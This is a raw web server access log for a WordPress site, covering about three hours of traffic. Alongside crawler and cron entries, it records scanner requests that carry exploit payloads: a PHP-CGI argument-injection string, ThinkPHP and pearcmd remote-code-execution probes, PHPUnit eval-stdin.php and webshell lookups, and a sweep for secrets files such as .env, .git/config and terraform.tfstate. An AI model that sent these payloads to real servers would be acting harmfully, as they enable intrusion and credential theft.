52.138.1.81 - - [03/Jul/2026:19:34:01 +0800] "GET /about.php HTTP/1.1" 404 27 "-" "-"
52.138.1.81 - - [03/Jul/2026:19:34:01 +0800] "GET /xyn.php HTTP/1.1" 404 27 "-" "-"
52.138.1.81 - - [03/Jul/2026:19:34:01 +0800] "GET /dx.php HTTP/1.1" 404 27 "-" "-"
63.182.172.12 - - [03/Jul/2026:19:34:03 +0800] "GET / HTTP/1.1" 301 5 "-" "Go-http-client/1.1"
36.133.115.36 - - [03/Jul/2026:19:34:03 +0800] "POST /wp-cron.php?doing_wp_cron=1783078443.1577761173248291015625 HTTP/1.1" 200 31 "-" "WordPress/7.0; http://cqqizhou.com"
52.138.1.81 - - [03/Jul/2026:19:34:03 +0800] "GET /wp-load.php HTTP/1.1" 200 5 "-" "-"
52.138.1.81 - - [03/Jul/2026:19:34:03 +0800] "GET /.well-known/about.php HTTP/1.1" 404 27 "-" "-"
52.138.1.81 - - [03/Jul/2026:19:34:03 +0800] "GET /biufile.php HTTP/1.1" 404 27 "-" "-"
63.182.172.12 - - [03/Jul/2026:19:34:03 +0800] "GET / HTTP/1.1" 200 35514 "http://36.133.115.36" "Go-http-client/1.1"
52.138.1.81 - - [03/Jul/2026:19:34:04 +0800] "GET //edit.php HTTP/1.1" 404 27 "-" "-"
52.138.1.81 - - [03/Jul/2026:19:34:04 +0800] "GET /w3lls.php HTTP/1.1" 404 27 "-" "-"
52.138.1.81 - - [03/Jul/2026:19:34:04 +0800] "GET /alls.php HTTP/1.1" 404 27 "-" "-"
39.130.58.231 - - [03/Jul/2026:19:37:05 +0800] "GET / HTTP/1.1" 200 35514 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/149.0.0.0 Safari/537.36 Edg/149.0.0.0"
39.130.58.231 - - [03/Jul/2026:19:37:51 +0800] "GET /wp-content/uploads/2025/07/1751425283-qizhou.kf_.qq_.com_.webp HTTP/1.1" 200 16864 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/149.0.0.0 Safari/537.36 Edg/149.0.0.0"
36.133.115.36 - - [03/Jul/2026:19:46:06 +0800] "POST /wp-cron.php?doing_wp_cron=1783079166.5536549091339111328125 HTTP/1.1" 200 31 "-" "WordPress/7.0; http://cqqizhou.com"
110.249.202.142 - - [03/Jul/2026:19:46:06 +0800] "GET /robots.txt HTTP/1.1" 200 190 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; https://zhanzhang.toutiao.com/)"
36.133.115.36 - - [03/Jul/2026:19:46:23 +0800] "POST /wp-cron.php?doing_wp_cron=1783079183.6375339031219482421875 HTTP/1.1" 200 31 "-" "WordPress/7.0; http://cqqizhou.com"
94.26.88.19 - - [03/Jul/2026:19:46:23 +0800] "POST /boaform/admin/formLogin HTTP/1.1" 404 9499 "http://36.133.115.36:80/admin/login.asp" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Gecko/20100101 Firefox/71.0"
66.249.79.7 - - [03/Jul/2026:19:55:50 +0800] "GET / HTTP/1.1" 200 35514 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
36.133.115.36 - - [03/Jul/2026:19:55:53 +0800] "POST /wp-cron.php?doing_wp_cron=1783079753.5620350837707519531250 HTTP/1.1" 200 31 "-" "WordPress/7.0; http://cqqizhou.com"
66.249.79.8 - - [03/Jul/2026:19:55:53 +0800] "GET / HTTP/1.1" 200 35070 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
36.133.115.36 - - [03/Jul/2026:19:57:45 +0800] "POST /wp-cron.php?doing_wp_cron=1783079865.1267430782318115234375 HTTP/1.1" 200 31 "-" "WordPress/7.0; http://cqqizhou.com"
51.75.129.178 - - [03/Jul/2026:19:57:45 +0800] "GET /robots.txt HTTP/1.1" 200 390 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
51.75.129.178 - - [03/Jul/2026:19:57:46 +0800] "GET /news/2592 HTTP/1.1" 200 24627 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
51.75.129.178 - - [03/Jul/2026:19:57:50 +0800] "GET /news/2597 HTTP/1.1" 200 24526 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
51.75.129.178 - - [03/Jul/2026:19:57:52 +0800] "GET /news/2601 HTTP/1.1" 200 20575 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
51.75.129.178 - - [03/Jul/2026:19:57:54 +0800] "GET /news/2603 HTTP/1.1" 200 21335 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
51.75.129.178 - - [03/Jul/2026:19:57:56 +0800] "GET /news/2606 HTTP/1.1" 200 24944 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
51.75.129.178 - - [03/Jul/2026:19:57:59 +0800] "GET /news/portfolio/%E5%86%B7%E8%BD%A7%E6%9D%BF HTTP/1.1" 200 22738 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
36.133.115.36 - - [03/Jul/2026:20:06:47 +0800] "POST /wp-cron.php?doing_wp_cron=1783080407.2996048927307128906250 HTTP/1.1" 200 31 "-" "WordPress/7.0; http://cqqizhou.com"
164.52.24.178 - - [03/Jul/2026:20:06:47 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36"
164.52.24.178 - - [03/Jul/2026:20:07:16 +0800] "GET / HTTP/1.1" 200 159688 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36"
36.133.115.36 - - [03/Jul/2026:20:16:26 +0800] "POST /wp-cron.php?doing_wp_cron=1783080986.2617230415344238281250 HTTP/1.1" 200 31 "-" "WordPress/7.0; http://cqqizhou.com"
49.51.180.2 - - [03/Jul/2026:20:16:26 +0800] "GET / HTTP/1.1" 200 35069 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
222.221.156.124 - - [03/Jul/2026:20:30:54 +0800] "GET / HTTP/1.1" 200 35514 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/149.0.0.0 Safari/537.36 Edg/149.0.0.0"
222.221.156.124 - - [03/Jul/2026:20:30:55 +0800] "GET /wp-content/uploads/2025/07/1751425283-qizhou.kf_.qq_.com_.webp HTTP/1.1" 200 16864 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/149.0.0.0 Safari/537.36 Edg/149.0.0.0"
36.133.115.36 - - [03/Jul/2026:20:32:02 +0800] "POST /wp-cron.php?doing_wp_cron=1783081921.9772610664367675781250 HTTP/1.1" 200 31 "-" "WordPress/7.0; http://cqqizhou.com"
222.221.156.124 - - [03/Jul/2026:20:32:02 +0800] "GET /wp-admin/ HTTP/1.1" 302 5 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/149.0.0.0 Safari/537.36 Edg/149.0.0.0"
36.133.115.36 - - [03/Jul/2026:20:35:31 +0800] "POST /wp-cron.php?doing_wp_cron=1783082131.3005690574645996093750 HTTP/1.1" 200 31 "-" "WordPress/7.0; http://cqqizhou.com"
66.249.79.8 - - [03/Jul/2026:20:35:31 +0800] "GET /news/2153 HTTP/1.1" 200 20988 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/150.0.7871.46 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
36.133.115.36 - - [03/Jul/2026:20:36:29 +0800] "POST /wp-cron.php?doing_wp_cron=1783082189.3077540397644042968750 HTTP/1.1" 200 31 "-" "WordPress/7.0; http://cqqizhou.com"
18.218.118.203 - - [03/Jul/2026:20:36:29 +0800] "GET / HTTP/1.1" 301 5 "-" "visionheight.com/scan Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/126.0.0.0 Safari/537.36"
18.218.118.203 - - [03/Jul/2026:20:36:55 +0800] "GET / HTTP/1.1" 301 5 "-" "visionheight.com/scan Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/126.0.0.0 Safari/537.36"
36.133.115.36 - - [03/Jul/2026:20:37:31 +0800] "POST /wp-cron.php?doing_wp_cron=1783082250.9861578941345214843750 HTTP/1.1" 200 31 "-" "WordPress/7.0; http://cqqizhou.com"
185.191.171.16 - - [03/Jul/2026:20:37:31 +0800] "GET /robots.txt HTTP/1.1" 200 190 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.2 - - [03/Jul/2026:20:37:32 +0800] "GET /bug HTTP/1.1" 200 13353 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
36.133.115.36 - - [03/Jul/2026:20:44:28 +0800] "POST /wp-cron.php?doing_wp_cron=1783082668.0199549198150634765625 HTTP/1.1" 200 31 "-" "WordPress/7.0; http://cqqizhou.com"
61.240.194.190 - - [03/Jul/2026:20:44:28 +0800] "GET /services/ HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36"
61.240.194.190 - - [03/Jul/2026:20:44:28 +0800] "GET http://cqqizhou.com/services HTTP/1.1" 200 32227 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36"
36.133.115.36 - - [03/Jul/2026:20:54:24 +0800] "POST /wp-cron.php?doing_wp_cron=1783083264.4140288829803466796875 HTTP/1.1" 200 31 "-" "WordPress/7.0; http://cqqizhou.com"
138.197.87.21 - - [03/Jul/2026:20:54:24 +0800] "GET / HTTP/1.0" 301 0 "-" "Shodan-Pull/1.0"
36.133.115.36 - - [03/Jul/2026:20:59:03 +0800] "POST /wp-cron.php?doing_wp_cron=1783083543.3605349063873291015625 HTTP/1.1" 200 31 "-" "WordPress/7.0; http://cqqizhou.com"
212.127.90.201 - - [03/Jul/2026:20:59:03 +0800] "POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1" 404 32862 "-" "libredtail-http"
212.127.90.201 - - [03/Jul/2026:20:59:06 +0800] "POST /?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1" 200 158029 "-" "libredtail-http"
212.127.90.201 - - [03/Jul/2026:20:59:07 +0800] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
212.127.90.201 - - [03/Jul/2026:20:59:08 +0800] "GET /vendor/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
212.127.90.201 - - [03/Jul/2026:20:59:09 +0800] "GET /vendor/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
212.127.90.201 - - [03/Jul/2026:20:59:09 +0800] "GET /vendor/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
212.127.90.201 - - [03/Jul/2026:20:59:10 +0800] "GET /vendor/phpunit/phpunit/LICENSE/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
212.127.90.201 - - [03/Jul/2026:20:59:11 +0800] "GET /vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
212.127.90.201 - - [03/Jul/2026:20:59:11 +0800] "GET /phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
212.127.90.201 - - [03/Jul/2026:20:59:12 +0800] "GET /phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
212.127.90.201 - - [03/Jul/2026:20:59:13 +0800] "GET /phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
212.127.90.201 - - [03/Jul/2026:20:59:14 +0800] "GET /phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
212.127.90.201 - - [03/Jul/2026:20:59:14 +0800] "GET /lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
212.127.90.201 - - [03/Jul/2026:20:59:15 +0800] "GET /lib/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
212.127.90.201 - - [03/Jul/2026:20:59:16 +0800] "GET /lib/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
212.127.90.201 - - [03/Jul/2026:20:59:17 +0800] "GET /lib/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
212.127.90.201 - - [03/Jul/2026:20:59:18 +0800] "GET /lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
212.127.90.201 - - [03/Jul/2026:20:59:18 +0800] "GET /laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
212.127.90.201 - - [03/Jul/2026:20:59:19 +0800] "GET /www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
212.127.90.201 - - [03/Jul/2026:20:59:20 +0800] "GET /ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
212.127.90.201 - - [03/Jul/2026:20:59:21 +0800] "GET /yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
212.127.90.201 - - [03/Jul/2026:20:59:21 +0800] "GET /zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
212.127.90.201 - - [03/Jul/2026:20:59:22 +0800] "GET /ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
212.127.90.201 - - [03/Jul/2026:20:59:23 +0800] "GET /V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
212.127.90.201 - - [03/Jul/2026:20:59:23 +0800] "GET /tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
212.127.90.201 - - [03/Jul/2026:20:59:24 +0800] "GET /test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
212.127.90.201 - - [03/Jul/2026:20:59:25 +0800] "GET /testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
212.127.90.201 - - [03/Jul/2026:20:59:26 +0800] "GET /api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
212.127.90.201 - - [03/Jul/2026:20:59:26 +0800] "GET /demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
212.127.90.201 - - [03/Jul/2026:20:59:27 +0800] "GET /cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
212.127.90.201 - - [03/Jul/2026:20:59:28 +0800] "GET /crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
212.127.90.201 - - [03/Jul/2026:20:59:29 +0800] "GET /admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
212.127.90.201 - - [03/Jul/2026:20:59:30 +0800] "GET /backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
212.127.90.201 - - [03/Jul/2026:20:59:30 +0800] "GET /blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
212.127.90.201 - - [03/Jul/2026:20:59:31 +0800] "GET /workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
212.127.90.201 - - [03/Jul/2026:20:59:32 +0800] "GET /panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
212.127.90.201 - - [03/Jul/2026:20:59:33 +0800] "GET /public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
212.127.90.201 - - [03/Jul/2026:20:59:33 +0800] "GET /apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
212.127.90.201 - - [03/Jul/2026:20:59:34 +0800] "GET /app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
36.133.115.36 - - [03/Jul/2026:20:59:36 +0800] "POST /wp-cron.php?doing_wp_cron=1783083576.8017261028289794921875 HTTP/1.1" 200 31 "-" "WordPress/7.0; http://cqqizhou.com"
212.127.90.201 - - [03/Jul/2026:20:59:36 +0800] "GET /index.php?s=/index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello HTTP/1.1" 200 67082 "-" "libredtail-http"
212.127.90.201 - - [03/Jul/2026:20:59:38 +0800] "GET /public/index.php?s=/index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello HTTP/1.1" 404 27 "-" "libredtail-http"
212.127.90.201 - - [03/Jul/2026:20:59:40 +0800] "GET /index.php?lang=../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/&/<?echo(md5(\x22hi\x22));?>+/tmp/index1.php HTTP/1.1" 200 158029 "-" "libredtail-http"
212.127.90.201 - - [03/Jul/2026:20:59:43 +0800] "GET /index.php?lang=../../../../../../../../tmp/index1 HTTP/1.1" 200 158029 "-" "libredtail-http"
212.127.90.201 - - [03/Jul/2026:20:59:46 +0800] "GET /containers/json HTTP/1.1" 301 5 "-" "libredtail-http"
212.127.90.201 - - [03/Jul/2026:20:59:49 +0800] "GET /containers/json HTTP/1.1" 301 5 "-" "libredtail-http"
219.136.244.30 - - [03/Jul/2026:21:09:19 +0800] "GET /services HTTP/1.1" 200 32227 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36"
36.133.115.36 - - [03/Jul/2026:21:23:42 +0800] "POST /wp-cron.php?doing_wp_cron=1783085022.2124559879302978515625 HTTP/1.1" 200 31 "-" "WordPress/7.0; http://cqqizhou.com"
43.155.27.244 - - [03/Jul/2026:21:23:42 +0800] "GET / HTTP/1.1" 200 35069 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
36.133.115.36 - - [03/Jul/2026:21:36:49 +0800] "POST /wp-cron.php?doing_wp_cron=1783085809.8367850780487060546875 HTTP/1.1" 200 31 "-" "WordPress/7.0; http://cqqizhou.com"
139.162.75.64 - - [03/Jul/2026:21:36:49 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36"
139.162.75.64 - - [03/Jul/2026:21:36:50 +0800] "GET / HTTP/1.1" 200 35514 "http://36.133.115.36" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36"
139.162.75.64 - - [03/Jul/2026:21:36:51 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36"
139.162.75.64 - - [03/Jul/2026:21:36:52 +0800] "GET / HTTP/1.1" 200 35514 "http://36.133.115.36" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36"
139.162.75.64 - - [03/Jul/2026:21:36:54 +0800] "GET /components/ HTTP/1.1" 404 9498 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36"
139.162.75.64 - - [03/Jul/2026:21:36:54 +0800] "GET /.github/workflows/*.json HTTP/1.1" 404 9498 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36"
139.162.75.64 - - [03/Jul/2026:21:36:55 +0800] "GET /api/debug HTTP/1.1" 404 9497 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36"
139.162.75.64 - - [03/Jul/2026:21:36:55 +0800] "GET /.env HTTP/1.1" 404 9497 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36"
139.162.75.64 - - [03/Jul/2026:21:36:55 +0800] "GET /debug.log HTTP/1.1" 404 9497 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36"
139.162.75.64 - - [03/Jul/2026:21:36:56 +0800] "GET /settings HTTP/1.1" 404 9498 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36"
139.162.75.64 - - [03/Jul/2026:21:36:57 +0800] "GET /api/admin HTTP/1.1" 404 9498 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36"
139.162.75.64 - - [03/Jul/2026:21:36:57 +0800] "GET /_dev HTTP/1.1" 404 9498 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36"
139.162.75.64 - - [03/Jul/2026:21:36:57 +0800] "GET /api/s3/ HTTP/1.1" 404 9498 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36"
139.162.75.64 - - [03/Jul/2026:21:36:57 +0800] "GET /aws_config.properties HTTP/1.1" 404 9498 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36"
139.162.75.64 - - [03/Jul/2026:21:36:58 +0800] "GET /database.json HTTP/1.1" 499 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36"
139.162.75.64 - - [03/Jul/2026:21:36:59 +0800] "GET /provider.tf HTTP/1.1" 499 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36"
139.162.75.64 - - [03/Jul/2026:21:36:59 +0800] "GET /terraform.tfstate.backup HTTP/1.1" 499 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36"
139.162.75.64 - - [03/Jul/2026:21:36:59 +0800] "GET /js/ HTTP/1.1" 499 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36"
139.162.75.64 - - [03/Jul/2026:21:36:59 +0800] "GET /config.php HTTP/1.1" 404 47 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36"
139.162.75.64 - - [03/Jul/2026:21:36:59 +0800] "GET /dist/js HTTP/1.1" 499 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36"
139.162.75.64 - - [03/Jul/2026:21:36:59 +0800] "GET /backup.sql HTTP/1.1" 499 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36"
139.162.75.64 - - [03/Jul/2026:21:36:59 +0800] "GET /.git/config HTTP/1.1" 499 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36"
139.162.75.64 - - [03/Jul/2026:21:36:59 +0800] "GET /api HTTP/1.1" 499 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36"
139.162.75.64 - - [03/Jul/2026:21:37:00 +0800] "GET /dump.sql HTTP/1.1" 499 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36"
139.162.75.64 - - [03/Jul/2026:21:37:00 +0800] "GET /terraform.tfstate HTTP/1.1" 499 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36"
139.162.75.64 - - [03/Jul/2026:21:37:00 +0800] "GET /debug/ HTTP/1.1" 499 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36"
139.162.75.64 - - [03/Jul/2026:21:37:00 +0800] "GET /aws_config.py HTTP/1.1" 499 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36"
139.162.75.64 - - [03/Jul/2026:21:37:00 +0800] "GET /.gitlab-ci.yaml HTTP/1.1" 499 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36"
139.162.75.64 - - [03/Jul/2026:21:37:00 +0800] "GET /appsettings.json HTTP/1.1" 499 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36"
139.162.75.64 - - [03/Jul/2026:21:37:00 +0800] "GET /config.py HTTP/1.1" 499 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36"
139.162.75.64 - - [03/Jul/2026:21:37:01 +0800] "GET /javascript/ HTTP/1.1" 499 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36"
139.162.75.64 - - [03/Jul/2026:21:37:01 +0800] "GET /bundle/ HTTP/1.1" 499 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36"
139.162.75.64 - - [03/Jul/2026:21:37:01 +0800] "GET /Dockerfile.prod HTTP/1.1" 499 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36"
139.162.75.64 - - [03/Jul/2026:21:37:01 +0800] "GET /Dockerfile.dev HTTP/1.1" 499 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36"
139.162.75.64 - - [03/Jul/2026:21:37:02 +0800] "GET /terraform.tfvars.json HTTP/1.1" 499 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36"
